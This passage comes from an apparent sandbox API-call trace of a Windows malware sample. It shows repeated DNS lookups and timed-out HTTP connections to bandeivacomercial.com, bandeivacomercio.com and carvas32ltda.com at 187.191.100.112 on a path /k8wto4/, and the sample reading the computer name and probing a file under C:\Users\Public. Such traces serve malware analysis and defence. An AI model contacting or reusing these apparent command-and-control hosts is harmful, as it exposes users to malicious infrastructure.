optval="\x01", optlen=0x68fe2c0) returned 0 [0092.030] getsockopt (in: s=0x944, level=6, optname=1, optval=0x68fe2c4, optlen=0x68fe2c0 | out: optval="", optlen=0x68fe2c0) returned 0 [0092.031] setsockopt (s=0x944, level=65535, optname=4, optval="", optlen=4) returned 0 [0092.031] htons (hostshort=0x0) returned 0x0 [0092.031] bind (s=0x944, addr=0x68fe224*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0092.031] getsockname (in: s=0x944, name=0x68fe218, namelen=0x68fe298 | out: name=0x68fe218*(sa_family=2, sin_port=0xc00a, sin_addr="0.0.0.0"), namelen=0x68fe298) returned 0 [0092.031] htons (hostshort=0xac0) returned 0xc00a [0092.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bandeivacomercial.com", cchCount1=21, lpString2="LOCALHOST", cchCount2=9) returned 1 [0092.031] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercial.com", cchUnicodeChar=21, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 21 [0092.031] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercial.com", cchUnicodeChar=21, lpASCIICharStr=0x7211ebc, cchASCIIChar=21 | out: lpASCIICharStr="bandeivacomercial.com") returned 21 [0092.031] GetAddrInfoW (in: pNodeName="bandeivacomercial.com", pServiceName=0x0, pHints=0x68fe2cc, ppResult=0x68fe2ec | out: ppResult=0x68fe2ec) returned 0 [0092.062] FreeAddrInfoW (pAddrInfo=0x54d28a8) [0092.062] htons (hostshort=0x50) returned 0x5000 [0092.062] connect (s=0x944, name=0x68fe27c*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0113.093] WSAGetLastError () returned 10060 [0113.093] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeaa, lpBuffer=0x68fc1a8, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0113.094] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeca, lpBuffer=0x68fc1a4, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0113.094] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x68fe20c) [0113.094] RtlUnwind (TargetFrame=0x68fe358, TargetIp=0x6ba8130, ExceptionRecord=0x68fdd2c, ReturnValue=0x0) [0113.095] shutdown (s=0x944, how=1) returned -1 [0113.095] closesocket (s=0x944) returned 0 [0113.096] GetCurrentThreadId () returned 0xc04 [0113.096] GetCurrentThreadId () returned 0xc04 [0113.096] GetCurrentThreadId () returned 0xc04 [0113.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fda85, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0113.096] GetCurrentThreadId () returned 0xc04 [0113.096] GetCurrentThreadId () returned 0xc04 [0113.096] GetCurrentThreadId () returned 0xc04 [0113.098] RtlUnwind (TargetFrame=0x68fe4d4, TargetIp=0x6ba8130, ExceptionRecord=0x68fdd2c, ReturnValue=0x0) [0113.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0113.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0113.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0113.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0113.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0113.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0113.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0113.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0113.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0113.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bandeivacomercial.com", cchCount1=21, lpString2="bandeivacomercio.com", cchCount2=20) returned 1 [0113.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0113.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fd93d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0113.103] socket (af=2, type=1, protocol=0) returned 0x944 [0113.104] getsockopt (in: s=0x944, level=65535, optname=4104, optval=0x68fda04, optlen=0x68fda00 | out: optval="\x01", optlen=0x68fda00) returned 0 [0113.104] getsockopt (in: s=0x944, level=6, optname=1, optval=0x68fda04, optlen=0x68fda00 | out: optval="", optlen=0x68fda00) returned 0 [0113.104] setsockopt (s=0x944, level=65535, optname=4, optval="", optlen=4) returned 0 [0113.104] htons (hostshort=0x0) returned 0x0 [0113.104] bind (s=0x944, addr=0x68fd964*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0113.105] getsockname (in: s=0x944, name=0x68fd958, namelen=0x68fd9d8 | out: name=0x68fd958*(sa_family=2, sin_port=0xc00b, sin_addr="0.0.0.0"), namelen=0x68fd9d8) returned 0 [0113.105] htons (hostshort=0xbc0) returned 0xc00b [0113.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bandeivacomercio.com", cchCount1=20, lpString2="LOCALHOST", cchCount2=9) returned 1 [0113.105] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercio.com", cchUnicodeChar=20, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 20 [0113.105] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercio.com", cchUnicodeChar=20, lpASCIICharStr=0x7211e7c, cchASCIIChar=20 | out: lpASCIICharStr="bandeivacomercio.com") returned 20 [0113.105] GetAddrInfoW (in: pNodeName="bandeivacomercio.com", pServiceName=0x0, pHints=0x68fda0c, ppResult=0x68fda2c | out: ppResult=0x68fda2c) returned 0 [0113.144] FreeAddrInfoW (pAddrInfo=0x300a740) [0113.144] htons (hostshort=0x50) returned 0x5000 [0113.144] connect (s=0x944, name=0x68fd9bc*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0134.193] WSAGetLastError () returned 10060 [0134.193] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeaa, lpBuffer=0x68fb8e8, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0134.193] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeca, lpBuffer=0x68fb8e4, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0134.193] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x68fd94c) [0134.193] RtlUnwind (TargetFrame=0x68fda98, TargetIp=0x6ba8130, ExceptionRecord=0x68fd46c, ReturnValue=0x0) [0134.194] shutdown (s=0x944, how=1) returned -1 [0134.194] closesocket (s=0x944) returned 0 [0134.194] GetCurrentThreadId () returned 0xc04 [0134.194] GetCurrentThreadId () returned 0xc04 [0134.194] GetCurrentThreadId () returned 0xc04 [0134.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fd1c5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0134.194] GetCurrentThreadId () returned 0xc04 [0134.194] GetCurrentThreadId () returned 0xc04 [0134.194] GetCurrentThreadId () returned 0xc04 [0134.195] RtlUnwind (TargetFrame=0x68fdc14, TargetIp=0x6ba8130, ExceptionRecord=0x68fd46c, ReturnValue=0x0) [0134.197] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0134.197] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.197] GetCurrentThreadId () returned 0xc04 [0134.197] GetCurrentThreadId () returned 0xc04 [0134.197] GetCurrentThreadId () returned 0xc04 [0134.197] GetCurrentThreadId () returned 0xc04 [0134.197] GetCurrentThreadId () returned 0xc04 [0134.197] GetCurrentThreadId () returned 0xc04 [0134.197] DefWindowProcW (hWnd=0x70144, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.197] DefWindowProcW (hWnd=0x10164, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.197] DefWindowProcW (hWnd=0x10162, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.197] DefWindowProcW (hWnd=0x10160, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.197] DefWindowProcW (hWnd=0x1015e, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x1015c, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x1015a, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x10158, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x20156, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x3014e, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x500fe, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x30154, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x60140, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x4010c, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x600fc, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x6013e, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x30150, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x40148, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.198] DefWindowProcW (hWnd=0x30152, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0134.199] IsWindowUnicode (hWnd=0x3014e) returned 1 [0134.199] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0134.199] GetCapture () returned 0x0 [0134.199] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0134.199] GetCurrentProcessId () returned 0x4f0 [0134.199] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0134.199] GetPropW (hWnd=0x3014e, lpString=0xc031) returned 0x0 [0134.199] GetParent (hWnd=0x3014e) returned 0x0 [0134.199] TranslateMessage (lpMsg=0x68ff884) returned 0 [0134.199] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0134.199] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff648 | out: lpPerformanceCount=0x68ff648*=16438509757946) returned 1 [0134.199] KillTimer (hWnd=0x3014e, uIDEvent=0x1) returned 1 [0134.199] SetTimer (hWnd=0x3014e, nIDEvent=0x1, uElapse=0x927c0, lpTimerFunc=0x0) returned 0x1 [0134.199] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0134.199] GetComputerNameW (in: lpBuffer=0x71e04bc, nSize=0x68ff600 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff600) returned 1 [0134.199] GetComputerNameW (in: lpBuffer=0x71e04e4, nSize=0x68ff63c | out: lpBuffer="N3EERVTWSM", nSize=0x68ff63c) returned 1 [0134.199] GetComputerNameW (in: lpBuffer=0x71e04e4, nSize=0x68ff614 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff614) returned 1 [0134.199] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Ew3.51N3E") returned 0xffffffff [0134.200] GetLastError () returned 0x2 [0134.200] GetCurrentThreadId () returned 0xc04 [0134.200] GetCurrentThreadId () returned 0xc04 [0134.200] GetCurrentThreadId () returned 0xc04 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0134.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="carvas32ltda.com", cchCount2=16) returned 1 [0134.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0134.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff371, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0134.202] socket (af=2, type=1, protocol=0) returned 0x944 [0134.202] getsockopt (in: s=0x944, level=65535, optname=4104, optval=0x68ff438, optlen=0x68ff434 | out: optval="\x01", optlen=0x68ff434) returned 0 [0134.202] getsockopt (in: s=0x944, level=6, optname=1, optval=0x68ff438, optlen=0x68ff434 | out: optval="", optlen=0x68ff434) returned 0 [0134.202] setsockopt (s=0x944, level=65535, optname=4, optval="", optlen=4) returned 0 [0134.202] htons (hostshort=0x0) returned 0x0 [0134.202] bind (s=0x944, addr=0x68ff398*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0134.202] getsockname (in: s=0x944, name=0x68ff38c, namelen=0x68ff40c | out: name=0x68ff38c*(sa_family=2, sin_port=0xc00c, sin_addr="0.0.0.0"), namelen=0x68ff40c) returned 0 [0134.202] htons (hostshort=0xcc0) returned 0xc00c [0134.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carvas32ltda.com", cchCount1=16, lpString2="LOCALHOST", cchCount2=9) returned 1 [0134.202] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 16 [0134.202] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x71fc56c, cchASCIIChar=16 | out: lpASCIICharStr="carvas32ltda.com") returned 16 [0134.202] GetAddrInfoW (in: pNodeName="carvas32ltda.com", pServiceName=0x0, pHints=0x68ff440, ppResult=0x68ff460 | out: ppResult=0x68ff460) returned 0 [0135.218] FreeAddrInfoW (pAddrInfo=0x300a740) [0135.219] htons (hostshort=0x50) returned 0x5000 [0135.219] connect (s=0x944, name=0x68ff3f0*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0156.262] WSAGetLastError () returned 10060 [0156.262] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeaa, lpBuffer=0x68fd31c, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0156.262] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeca, lpBuffer=0x68fd318, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0156.262] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x68ff380) [0156.263] RtlUnwind (TargetFrame=0x68ff4cc, TargetIp=0x6ba8130, ExceptionRecord=0x68feeac, ReturnValue=0x0) [0156.263] shutdown (s=0x944, how=1) returned -1 [0156.263] closesocket (s=0x944) returned 0 [0156.264] GetCurrentThreadId () returned 0xc04 [0156.264] GetCurrentThreadId () returned 0xc04 [0156.264] GetCurrentThreadId () returned 0xc04 [0156.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fec05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=">\x14\x07Lì\x8f\x06a@Ø\x06 >\x14\x07\x13\x08Ø\x06$ì\x8f\x06§\x84º\x06Lì\x8f\x06Tì\x8f\x06\x8c\x83º\x06Lì\x8f\x06\x88ÙÓ\x06ðø\x18\x07ðø\x18\x07Öô×\x06xì\x8f\x06", lpUsedDefaultChar=0x0) returned 0 [0156.264] GetCurrentThreadId () returned 0xc04 [0156.264] GetCurrentThreadId () returned 0xc04 [0156.264] GetCurrentThreadId () returned 0xc04 [0156.266] RtlUnwind (TargetFrame=0x68ff648, TargetIp=0x6ba8130, ExceptionRecord=0x68feeac, ReturnValue=0x0) [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.269] 